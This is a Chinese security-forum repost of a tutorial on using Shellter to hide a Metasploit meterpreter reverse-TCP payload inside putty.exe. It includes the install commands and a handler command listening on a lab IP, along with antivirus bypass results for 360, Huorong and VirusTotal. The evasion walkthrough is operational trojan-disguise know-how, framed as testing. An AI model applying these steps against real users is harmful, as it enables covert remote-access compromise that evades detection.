安全矩阵

 找回密码
 立即注册
搜索
查看: 2463|回复: 0

远控免杀专题(7)-Shellter免杀(VT免杀率7/69)

[复制链接]

30

主题

60

帖子

447

积分

中级会员

Rank: 3Rank: 3

积分
447
发表于 2020-3-7 22:25:52 | 显示全部楼层 |阅读模式
本帖最后由 oldmoon 于 2020-3-7 22:59 编辑

转载自微信公众号:Tide安全团队    作者:重剑无锋

免杀能力一览表

几点说明:
1、上表中标识 √ 说明相应杀毒软件未检测出病毒,也就是代表了Bypass。
2、为了更好的对比效果,大部分测试payload均使用msf的windows/meterperter/reverse_tcp模块生成。
3、由于本机测试时只是安装了360全家桶和火绒,所以默认情况下360和火绒杀毒情况指的是静态+动态查杀。360杀毒版本5.0.0.8160(2019.12.12),火绒版本5.0.33.13(2019.12.12),360安全卫士12.0.0.2001(2019.12.17)。
4、其他杀软的检测指标是在virustotal.com(简称VT)上在线查杀,所以可能只是代表了静态查杀能力,数据仅供参考,不足以作为免杀的精确判断指标。

前言
Shellter和Venom、Veil是三大老牌免杀工具,Shellter是一个开源的免杀工具,利用动态Shellcode注入或者命令来实现免杀的效果。

安装Shellter
1、kali中已经自带shellter,可在图形界面中直接执行shellter命令即可。

2、ubuntu系统中apt安装
  1. apt-get update
  2. apt-get install shellter
复制代码
3、手动下载windows版
下载后解压,无需安装,cmd下可直接使用



生成payload(VT免杀率7/69)
我就直接用kali自带的shellter进行演示,需要提前准备一个pe文件作为被注入程序。我还是用之前选的putty.exe来进行测试。

之后程序会把putty.exe进行备份,因为生成的payload会自动覆盖原来的putty.exe。
还是选择windows/meterpreter/reverse_tcp作为payload。
上面有个选项Enable Stealth Mode,是否启用隐身模式,启用后免杀效果会变差,建议不启用。
全程自动化生成,最终的生成文件会替换原来的putty.exe。
通过对比可发现程序稍微变大了
在msf中使用handler -H 10.211.55.2 -P 3333 -p windows/meterpreter/reverse_tcp进行监听
在测试机中执行生成的putty.exe,360和火绒均可免杀
msf 正常上线
virustotal.com中7/69个报毒,卡巴、瑞星、微软三个都没bypass。。



小结
Shellter安装非常简单,使用也非常便捷,而且生成的payload免杀效果也都比较好,windows和linux下都可以使用,实在是居家旅行、**灭口必备良药。我是用的自动模式进行生产payload,你可以根据自己的需要进行手动配置,这样生成的payload免杀效果会更好。
因为Shellter生成的shellcode是动态的,所以被查杀的几率也有所不同,测试过几次自动化生成的payload,最好的秒杀效果是4/71,最差的15/70,整体来说也算不错了。


参考整理
msf免杀及后渗透技术:https://bbs.ichunqiu.com/thread-49618-1-1.html



本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-9-8 10:49 , Processed in 0.015074 second(s), 20 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表